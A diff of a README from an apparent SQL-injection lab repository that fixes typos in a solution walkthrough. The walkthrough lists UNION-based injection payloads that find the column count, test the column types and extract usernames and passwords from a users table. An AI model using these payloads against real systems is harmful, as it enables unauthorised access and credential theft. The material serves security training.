0xCyberY/SQL-injection/README.md

 1. *Solutions*

-  By appling `'+UNION+SELECT+NULL,NULL--` we can say the database has tow columns.
+  By applying `'+UNION+SELECT+NULL,NULL--` we can say the database has tow columns.
-  By appling `'+UNION+SELECT+'abc','xyz'--` we can say the columns have string values.
+  By applying `'+UNION+SELECT+'abc','xyz'--` we can say the columns have string values.
-  To retrieve the contents of the users table we can use the following payload `'+UNION+SELECT+username,+password+FROM+users--` where `username` is the name of first column ,`password` is the name of second column and `users` is the name of the table in the database
+  To retrieve the contents of the users table we can use the following payload `'+UNION+SELECT+username,+password+FROM+users--` where `username` is the name of first column ,`password` is the name of second column and `users` is the name of the table in the database.

    __Example__